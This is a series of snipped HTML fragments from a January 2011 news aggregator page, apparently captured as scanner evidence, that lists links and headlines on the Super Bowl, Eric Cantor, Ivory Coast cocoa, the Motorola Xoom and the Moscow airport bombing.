<span><a target="_blank" class="usg-AFQjCNFr6r5QBoathNzT09PJwnvBUwlkuA " href="http://www.nytimes.com/2011/01/24/us/24detroit.html?src=twrhp" id="MAA4AEgOUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.reuters.com/article/idUSTRE70N6VU20110124" class="usg-AFQjCNGwTpqGo6WmM4BNaUuWfZ8_PglAEw " title="Reuters"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/N_5JZv88v78-mM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.reuters.com/article/idUSTRE70N6VU20110124" class="usg-AFQjCNGwTpqGo6WmM4BNaUuWfZ8_PglAEw "> Reuters </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNFGDQxlf2HkP_kY_tNzY5iMi_-1RQ " href="http://content.usatoday.com/communities/thehuddle/post/2011/01/donald-driver-super-bowl-vs-steelers-is-packers-to-lose/1" id="MAA4AEgPUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=6_dUkNdoPZI">Video: 
Raw Video: Packers Fans Rejoice in NFC Title
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.sportingnews.com/nfl/feed/2011-01/super-bowl-xlv/story/roethlisberger-rodgers-look-to-bounce-back-in-super-bowl" target="_blank" class="usg-AFQjCNGQElfXImuP5gjNiO4sKtARSBFJYA " id="MAA4AEgPUAFgAmoCdXM">Roethlisberger, Rodgers look to bounce back in Super Bowl</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHPpTk4ieUXgu-P8RRRMf8MWo7J0w " href="http://www.nfl.com/news/story/09000d5d81de4791/article/steelers-packers-provide-plan-for-others-to-find-success" id="MAA4AEgPUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGPrr0vkoRqaEiQt3vFQA_4L6QnyA " href="http://www.chron.com/disp/story.mpl/ap/tx/7395456.html" id="MAA4AEgPUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGQGgM5czT5R6B-ddNymghkSc-UmA " href="http://www.nesn.com/2011/01/charles-woodson-packers-send-barack-obama-a-message-after-nfc-championship.html" id="MAA4AEgPUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHJIPZyVcw6wNepnm-LyDHFaO6Clg " href="http://profootballtalk.nbcsports.com/2011/01/24/packers-fans-not-happy-with-treatment-in-chicago/" id="MAA4AEgPUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.nydailynews.com/news/politics/2011/01/23/2011-01-23_cantor_obama_is_a_citizen_of_the_united_states.html?r=news/national" class="usg-AFQjCNFoJU-Zr1h_OLg7wpLzqvR44YWYmg " title="New York Daily News"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/-wjwT5njOYurrM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.nydailynews.com/news/politics/2011/01/23/2011-01-23_cantor_obama_is_a_citizen_of_the_united_states.html?r=news/national" class="usg-AFQjCNFoJU-Zr1h_OLg7wpLzqvR44YWYmg "> New York Da... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNHD9gmMcX5UbuSNEialO4A3C839Zg " href="http://online.wsj.com/article/BT-CO-20110124-713737.html" id="MAA4AEgQUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://chicagobreakingbusiness.com/2011/01/cantor-declares-state-bankruptcy-law-doa.html" target="_blank" class="usg-AFQjCNGdoU1Lh67pcIeV49PyT7DoCZ4pRg " id="MAA4AEgQUAJgAmoCdXM">Cantor declares state bankruptcy law DOA</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFsJ-xmO_ejoSJAqbQS-S39fJbZpg " href="http://www.reuters.com/article/idUSN2419775920110124" id="MAA4AEgQUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGhzLhkbOVz53QHJ6bmW7YycCP-lA " href="http://latimesblogs.latimes.com/money_co/2011/01/eric-cantor-states-bankruptcy-bailouts-house-majority-leader-gingrich.html" id="MAA4AEgQUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGYGF2tFrtqpMAo1sUiv4XCv4MgNA " href="http://tpmdc.talkingpointsmemo.com/2011/01/republicans-in-a-fix-on-infrastructure-spending.php" id="MAA4AEgQUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHVSFWw5bW8lOlkPcETmuGH7fJddA " href="http://voices.washingtonpost.com/44/2011/01/eric-cantor-president-obama-wa.html" id="MAA4AEgQUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://fifthdown.blogs.nytimes.com/2011/01/21/sundays-a-f-c-championship-matchup/" class="usg-AFQjCNHmjAMFU4b0us-F6VwKbdDgRkDgpQ " title="New York Times (blog)"><img alt="" class="" src="http://nt2.ggpht.com/news/tbn/1q0LPLp7fAUbbM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://fifthdown.blogs.nytimes.com/2011/01/21/sundays-a-f-c-championship-matchup/" class="usg-AFQjCNHmjAMFU4b0us-F6VwKbdDgRkDgpQ "> New York Ti... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNG6qrigwK0jGaJWzKxvUijw-g-xcA " href="http://sports.espn.go.com/new-york/nfl/news/story?id=6054732&campaign=rss&source=NFLHeadlines" id="MAA4AEgRUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=Dye1RPvkcB0">Video: 
Jets lose to Steelers in AFC championship game
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://online.wsj.com/article/AP08eefa0c9e844584a494106fb21688b5.html" target="_blank" class="usg-AFQjCNFbJ1uuza5woqRu_iLy2zuvPb41xw " id="MAA4AEgRUAFgAmoCdXM">Rex Ryan still feeling Super about Jets' future</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEl1IHYaTs16CTlgmfI4z1L2yr4yg " href="http://itiswhatitis.weei.com/sports/newengland/football/patriots/2011/01/24/rex-ryan-jets-have-done-a-pretty-good-job-of-beating-patriots/" id="MAA4AEgRUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFTsAZ0TgzKZ399uC9seSOMhzGZ4w " href="http://nfl.fanhouse.com/2011/01/24/afc-nfc-championship-games-continue-nfls-tv-ratings-boon/" id="MAA4AEgRUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNG2AZEXbdt5AYsMtu8msDEkOt-3Fw " href="http://content.usatoday.com/communities/thehuddle/post/2011/01/rex-ryan-jets-have-to-learn-to-beat-more-than-just-patriots/1" id="MAA4AEgRUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNF9C8wL3fOFsYTsgaPRXS8A3ltpVg " href="http://www.nfl.com/news/story/09000d5d81de420a/article/conference-title-games-garner-best-tv-ratings-in-14-years" id="MAA4AEgRUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.theglobeandmail.com/news/world/africa-mideast/ivory-coasts-ouattara-calls-for-cocoa-export-ban/article1880409/" class="usg-AFQjCNFUbFimVtitAMjquhLMn2StbziAyQ " title="Globe and Mail"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/PxjjM3Orb87AzM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.theglobeandmail.com/news/world/africa-mideast/ivory-coasts-ouattara-calls-for-cocoa-export-ban/article1880409/" class="usg-AFQjCNFUbFimVtitAMjquhLMn2StbziAyQ "> Globe and M... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNG3JzDql7WAkcCHRYSnsAbbGadxAg " href="http://www.voanews.com/english/news/africa/Nigeria-Wants-UN-Backing-for-Military-Intervention-in-Ivory-Coast-114510399.html" id="MAA4AEgSUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.washingtonpost.com/wp-dyn/content/article/2011/01/24/AR2011012404718.html" target="_blank" class="usg-AFQjCNH8xyRSjagQTe7qcKbQ1RxMrRntiw " id="MAA4AEgSUAFgAmoCdXM">US backs ban on Ivory Coast cocoa imports</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.bloomberg.com/news/2011-01-24/summary-box-ivory-coast-might-ban-cocoa-exports.html" target="_blank" class="usg-AFQjCNFvQyMenWhWCi8Scnr2HQOzz1Myqw " id="MAA4AEgSUAJgAmoCdXM">Summary Box: Ivory Coast might ban cocoa exports</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNE8w5-3wv-Joef82tAEi3WkRMlKBg " href="http://abcnews.go.com/Business/wireStory?id=12751095" id="MAA4AEgSUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGEkYfaKL41vivSMDYuj5cNE_tgpw " href="http://www.dailytimes.com.pk/default.asp?page=2011%5C01%5C25%5Cstory_25-1-2011_pg4_3" id="MAA4AEgSUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHt7HNh28TuTa201PSzxavp-qCB9w " href="http://www.reuters.com/article/idUSTRE70N66I20110124" id="MAA4AEgSUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.reuters.com/article/idUSTRE70N5P220110124" class="usg-AFQjCNHe6Eb7ocpi6F9HMD_xPO3C4NQ3CQ " title="Reuters"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/M2eWhkFHXWq5TM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.reuters.com/article/idUSTRE70N5P220110124" class="usg-AFQjCNHe6Eb7ocpi6F9HMD_xPO3C4NQ3CQ "> Reuters </a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.pcmag.com/article2/0,2817,2376180,00.asp" target="_blank" class="usg-AFQjCNEeedKNUlqWQgoNsXULz0osRTWeaQ " id="MAA4AEgTUAFgAmoCdXM">Twitter's Ad Revenue Predicted to Pass MySpace</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.emarketer.com/Article.aspx?R=1008192" target="_blank" class="usg-AFQjCNFHIkw8yyxLm5eiE9NU2pbWrOnIXQ " id="MAA4AEgTUAJgAmoCdXM">Twitter Ad Revenues to Soar This Year</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHe6Eb7ocpi6F9HMD_xPO3C4NQ3CQ " href="http://www.reuters.com/article/idUSTRE70N5P220110124" id="MAA4AEgTUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFZO8otCjpSj5AP5vwSF4Llgt--JA " href="http://www.bloomberg.com/news/2011-01-24/twitter-s-advertising-revenue-may-triple-to-150-million-emarketer-says.html" id="MAA4AEgTUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHEmKzfFERxkTqgK7-nDAlnLBvvlg " href="http://www.digitaltrends.com/computing/twitter-advertising-revenue-swiftly-challenging-myspace/" id="MAA4AEgTUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGVukQYF2CS02hBDpoVNsgSl2Vhrg " href="http://business.newsfactor.com/story.xhtml?story_id=12000005I4S0" id="MAA4AEgTUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://content.usatoday.com/communities/onpolitics/post/2011/01/michele-bachmann-tea-party-sotu-response-/1" class="usg-AFQjCNEQHKiw9TKQgRYUmMwzm3YZzn7Z0g " title="USA Today"><img alt="" class="" src="http://nt2.ggpht.com/news/tbn/_lRM2j82QTbMDM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://content.usatoday.com/communities/onpolitics/post/2011/01/michele-bachmann-tea-party-sotu-response-/1" class="usg-AFQjCNEQHKiw9TKQgRYUmMwzm3YZzn7Z0g "> USA Today </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNGAfsCM8qVY21SNmrGDm9XDV7AnAg " href="http://www.csmonitor.com/USA/Politics/The-Vote/2011/0124/Scalia-addresses-Tea-Party-Caucus-but-should-he" id="MAA4AEgUUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.cbsnews.com/8301-503544_162-20029369-503544.html" target="_blank" class="usg-AFQjCNH9dvJ6QMshI9GB-37Wn9ge8VjujA " id="MAA4AEgUUAFgAmoCdXM">Scalia Lectures Lawmakers - Behind Closed Doors</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.politico.com/news/stories/0111/48043.html" target="_blank" class="usg-AFQjCNHS1xbvITXJO9BTabNhSXTloex_3A " id="MAA4AEgUUAJgAmoCdXM">Tea time for Antonin Scalia</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFuFRTvug7VlSqLII_mmBygDvrNnQ " href="http://www.washingtonpost.com/wp-dyn/content/article/2011/01/21/AR2011012106553.html" id="MAA4AEgUUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHFjYfu7P8THOH4gtZWKzOYxjSmkg " href="http://www.cnn.com/2011/US/01/21/scotus.scalia.tea.party/" id="MAA4AEgUUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHNIlI2w06i8a1hNzLJ7zkDAMDlTw " href="http://www.bloomberg.com/news/2011-01-24/bachmann-s-tea-party-caucus-to-host-high-court-justice-scalia.html" id="MAA4AEgUUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEQHKiw9TKQgRYUmMwzm3YZzn7Z0g " href="http://content.usatoday.com/communities/onpolitics/post/2011/01/michele-bachmann-tea-party-sotu-response-/1" id="MAA4AEgUUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.computerworld.com/s/article/9206080/Motorola_Xoom_to_launch_on_Feb._17_priced_at_700_report_says" class="usg-AFQjCNHVkBCpHSqCvo6_iJ3QeAte9R4HtQ " title="Computerworld"><img alt="" class="" src="http://nt1.ggpht.com/news/tbn/daFSu9xUqylQ5M/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.computerworld.com/s/article/9206080/Motorola_Xoom_to_launch_on_Feb._17_priced_at_700_report_says" class="usg-AFQjCNHVkBCpHSqCvo6_iJ3QeAte9R4HtQ "> Computerwor... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNHN9PKHYEKTa2KbqrEgQddEwTWgIw " href="http://techland.time.com/2011/01/24/motorola-xoom-tablet-tipped-for-february-17-release-at-700/" id="MAA4AEgVUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.pcmag.com/article2/0,2817,2376161,00.asp" target="_blank" class="usg-AFQjCNGKiHjC_kakoEG8A44FhwtCe2AHAg " id="MAA4AEgVUAFgAmoCdXM">Reports: Motorola Xoom to Cost About the Same as 32GB iPad</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.pcworld.com/businesscenter/article/217509/motorola_xoom_tablets_price_will_shoot_it_in_the_foot.html" target="_blank" class="usg-AFQjCNELXhCiOQGRPhUbTNbYaBMofmmhCA " id="MAA4AEgVUAJgAmoCdXM">Motorola Xoom Tablet's Price Will Shoot It in the Foot</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHYFaiEpBfJtoQNCxiTBsYvMlBrJg " href="http://news.cnet.com/8301-17852_3-20029268-71.html" id="MAA4AEgVUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNH8bZiGGhCNt2S7b-uGLUlcP2m-Bw " href="http://arstechnica.com/gadgets/news/2011/01/report-motorola-xoom-to-launch-february-17-for-around-700.ars" id="MAA4AEgVUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGqPg2wGubRAMYVqwEuEZMwagOScw " href="http://voices.washingtonpost.com/fasterforward/2011/01/reports_xoom_release_date_is_f.html" id="MAA4AEgVUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNF67MVvZezEMdstKe1ABRVW1iIdfw " href="http://www.msnbc.msn.com/id/41220540/ns/business-motley_fool/" id="MAA4AEgVUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://espn.go.com/espn/page2/index?id=6054739" class="usg-AFQjCNFGoGNleixTSVIz74P5THQvla9iuA " title="ESPN"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/lwOfOh7k2QfPWM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://espn.go.com/espn/page2/index?id=6054739" class="usg-AFQjCNFGoGNleixTSVIz74P5THQvla9iuA "> ESPN </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNERsQsvwArMESZUIAdaSjLBqFVtiw " href="http://newsroom.mtv.com/2011/01/24/christina-aguilera-super-bowl-national-anthem/" id="MAA4AEgWUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://idolator.com/5748782/christina-aguilera-super-bowl" target="_blank" class="usg-AFQjCNHKyGnLj6ovxPmg0Knrcv05rRgDNA " id="MAA4AEgWUAFgAmoCdXM">Christina Aguilera To Belt Out National Anthem At The Super Bowl</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.allheadlinenews.com/briefs/articles/90031962?Christina%20Aguilera%20to%20perform%20National%20Anthem%20at%20this%20year's%20Super%20Bowl" target="_blank" class="usg-AFQjCNE7tavSyVtGLdaBmnCMH0pYaPcRXQ " id="MAA4AEgWUAJgAmoCdXM">Christina Aguilera to perform National Anthem at this year's Super Bowl</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEpDJgJFt_j6AUHmRc1hYxeEhYaug " href="http://dallas.sbnation.com/dallas-cowboys/2011/1/24/1953866/super-bowl-xlv-in-dallas-christina-aguilera-to-sing-national-anthem" id="MAA4AEgWUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFXw3IOVm2JgObaxcOZTKNiNvTkvA " href="http://www.thehollywoodgossip.com/2011/01/christina-aguilera-to-sing-national-anthem-at-super-xlv/" id="MAA4AEgWUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNG9O3H7YyZsvF7VtGk2uLQJoCms_Q " href="http://www.reuters.com/article/idUSTRE70N5SV20110124" id="MAA4AEgWUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHd5BkpTyVKEDZuNM7PDSvtOkMe1Q " href="http://thecelebritycafe.com/feature/christina-aguilera-sing-national-anthem-year-s-super-bowl-01-24-2011" id="MAA4AEgWUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNHiERdzKjGz_owcJAKwYgaq2jAmhQ " href="http://www.cnn.com/2011/WORLD/africa/01/24/winds.change/?hpt=C1" id="-9130425399277123681"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNHUIAy8iUF8AYKI9an-TtV9uy8Ftw " href="http://www.foxnews.com/world/2011/01/24/ap-interview-iaea-critical-irans-cooperation/" id="415738970037031730"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNHBvFgzzTzx9w0WGdmzzseti6ngaQ " href="http://www.reuters.com/article/idUSTRE70N6U520110124" id="1857102735582363016"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNEK2ud_k0F8qRyqgsh-kAYgITivyQ " href="http://voices.washingtonpost.com/capitalsinsider/matt-hendricks/video-matt-hendricks-answers-y.html" id="MAE4AEgAUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNEYW-eOsdylgGuCJv1odl_DRoolHg " href="http://voices.washingtonpost.com/dr-gridlock/2011/01/bill_would_allow_mcdonnell_to.html" id="MAE4AEgBUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNE64Ep_yxeXZUqNQV9MB1-njgF7pQ " href="http://voices.washingtonpost.com/capitalsinsider/new-york-rangers/capitals-seek-more-than-redemp.html" id="MAE4AEgCUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNHUVFbVVUXTIHlz-l1C5dBB5sKdxg " href="http://www.latimes.com/news/local/la-me-mega-storm-20110123,0,1868244.story" id="MAE4AUgAUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNH8qeVdzvBEnfzEKH7vE3_vwVQTqg " href="http://www.naturalnews.com/031076_USDA_bird_deaths.html" id="MAE4AUgBUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNF2Ndq7u1NFQAEeGnztrLOHGBXwVA " href="http://online.wsj.com/article/SB10001424052748703954004576090020541379588.html" id="MAE4AUgCUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNGblh1wTgbZsSv-VYZXiNbBHiKNXw " href="http://news.nationalgeographic.com/news/2011/01/110119-yellowstone-park-supervolcano-eruption-magma-science/" id="MAE4AUgDUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNHyWl3EN4CNcBZDRvx0uWAGqRTn-w " href="http://www.bbc.co.uk/news/uk-12225163" id="MAE4AUgEUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNGGQHDo9ynACtTjJAIzBv77Y3Il_g " href="http://www.latimes.com/news/local/la-me-surfer-mavericks-20110124,0,4017331.story" id="MAE4AUgFUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNEge-ZTK-NGgKR5GGl5cueoZK1MNQ " href="http://www.cnn.com/2011/WORLD/europe/01/21/femen.topless.protest/" id="MAE4AUgGUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNF-_hi1BV8k2Oo3VN4qgrAvppO1bQ " href="http://www.wired.com/gadgetlab/2011/01/windows-phone-7-jailbreakers/" id="MAE4AUgHUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNE5JHQ3Gv91XCD5GZEafo-YjxGefA " href="http://www.nytimes.com/2011/01/22/your-money/401ks-and-similar-plans/22money.html" id="MAE4AUgIUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNFqlgKE7z1GSfD-_OAHlbbllpcUzA " href="http://online.wsj.com/article/SB10001424052748703951704576092371207903438.html" id="MAE4AUgJUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNHvSlpbZ6Gr6O9Sj5zjv2qb4n4b4g " href="http://www.latimes.com/news/opinion/commentary/la-oe-rodriguez-20110124,0,5860440.column" id="MAE4AUgKUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNEdtmVNLHhQzK5b8i2ymGRHBdQgJw " href="http://www.nytimes.com/2011/01/23/books/review/Paul-t.html" id="MAE4AUgLUABgAmoCdXM"><span class="titletext">
...[SNIP]...
<a class="js-link thumbnail-toggle" href="javascript:void(0);" onclick="return false;"><img src="//i.ytimg.com/vi/V36fQu0Vk80/default.jpg" alt="" class="thumbnail" width="120" height="90">
<div class="icon play-icon">
...[SNIP]...
<a class="js-link thumbnail-toggle" href="javascript:void(0);" onclick="return false;"><img src="//i.ytimg.com/vi/V36fQu0Vk80/default.jpg" alt="" class="thumbnail" width="120" height="90">
<div class="icon play-icon">
...[SNIP]...
<div class="video-details"><a href="http://www.youtube.com/watch?v=V36fQu0Vk80">Domodedovo blast masterminds proud of terror 'fundraiser' - Peter Lavelle</a>
...[SNIP]...
</div>
<a href="http://www.youtube.com/watch?v=V36fQu0Vk80">Watch video</a>
...[SNIP]...
<a class="js-link thumbnail-toggle" href="javascript:void(0);" onclick="return false;"><img src="//i.ytimg.com/vi/QMHmzs0RsUA/default.jpg" alt="" class="thumbnail" width="120" height="90">
<div class="icon play-icon">
...[SNIP]...
<a class="js-link thumbnail-toggle" href="javascript:void(0);" onclick="return false;"><img src="//i.ytimg.com/vi/QMHmzs0RsUA/default.jpg" alt="" class="thumbnail" width="120" height="90">
<div class="icon play-icon">
...[SNIP]...
<div class="video-details"><a href="http://www.youtube.com/watch?v=QMHmzs0RsUA">NBA TV Top 5: January 23rd</a>
...[SNIP]...
</div>
<a href="http://www.youtube.com/watch?v=QMHmzs0RsUA">Watch video</a>
...[SNIP]...
<a class="js-link thumbnail-toggle" href="javascript:void(0);" onclick="return false;"><img src="//i.ytimg.com/vi/Ay5CfV-_438/default.jpg" alt="" class="thumbnail" width="120" height="90">
<div class="icon play-icon">
...[SNIP]...
<a class="js-link thumbnail-toggle" href="javascript:void(0);" onclick="return false;"><img src="//i.ytimg.com/vi/Ay5CfV-_438/default.jpg" alt="" class="thumbnail" width="120" height="90">
<div class="icon play-icon">
...[SNIP]...
<div class="video-details"><a href="http://www.youtube.com/watch?v=Ay5CfV-_438">Sport Science: Devin Hester Vs. A Black Bear</a>
...[SNIP]...
</div>
<a href="http://www.youtube.com/watch?v=Ay5CfV-_438">Watch video</a>
...[SNIP]...
<a class="js-link thumbnail-toggle" href="javascript:void(0);" onclick="return false;"><img src="//i.ytimg.com/vi/jKYkFgMz7fQ/default.jpg" alt="" class="thumbnail" width="120" height="90">
<div class="icon play-icon">
...[SNIP]...
<a class="js-link thumbnail-toggle" href="javascript:void(0);" onclick="return false;"><img src="//i.ytimg.com/vi/jKYkFgMz7fQ/default.jpg" alt="" class="thumbnail" width="120" height="90">
<div class="icon play-icon">
...[SNIP]...
<div class="video-details"><a href="http://www.youtube.com/watch?v=jKYkFgMz7fQ">Raw Video: Deadly Explosion at Moscow Airport</a>
...[SNIP]...
</div>
<a href="http://www.youtube.com/watch?v=jKYkFgMz7fQ">Watch video</a>
...[SNIP]...
<a class="js-link thumbnail-toggle" href="javascript:void(0);" onclick="return false;"><img src="//i.ytimg.com/vi/Oy3zTTuXoPU/default.jpg" alt="" class="thumbnail" width="120" height="90">
<div class="icon play-icon">
...[SNIP]...
<a class="js-link thumbnail-toggle" href="javascript:void(0);" onclick="return false;"><img src="//i.ytimg.com/vi/Oy3zTTuXoPU/default.jpg" alt="" class="thumbnail" width="120" height="90">
<div class="icon play-icon">
...[SNIP]...
<div class="video-details"><a href="http://www.youtube.com/watch?v=Oy3zTTuXoPU">NYC Mayor Calls for Gun Reform</a>
...[SNIP]...
</div>
<a href="http://www.youtube.com/watch?v=Oy3zTTuXoPU">Watch video</a>
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNGabipshqDpEThvts4Js4ElbcfX_A " href="http://news.blogs.cnn.com/2011/01/24/explosion-rocks-moscow-airport/" id="8662120574501095458"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNGQCd1rS9GL5PNAUudI5RpsxmOAbQ " href="http://news.blogs.cnn.com/2011/01/23/jack-lalanne-dead-at-96/" id="-7783858872244448158"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNHH_B8Vhlsac2V2jAPJyKDuyVeAAA " href="http://mashable.com/2011/01/24/engaging-facebook-fans/" id="-7258938783345423075"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNH2LifoZ2DaEkfGjsc9kMMPnJB2kg " href="http://www.cbsnews.com/stories/2011/01/24/ap/strange/main7278196.shtml" id="-7252428281190763667"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNEPdEfqF2nkQ1qDcAFFpZusUDt9tA " href="http://www.reuters.com/article/idUSTRE70N2TQ20110124" id="5335316056229417362"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNENgV2GEqlhUgEGu5EME68UcyGRvw " href="http://www.theatlantic.com/technology/archive/2011/01/the-inside-story-of-how-facebook-responded-to-tunisian-hacks/70044/" id="-6685976054251165433"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNE9LKKsqu443-DV8lm4q72snzhdWw " href="http://www.nytimes.com/2011/01/24/technology/24cook.html" id="3851731467917620472"><span class="titletext">
...[SNIP]...
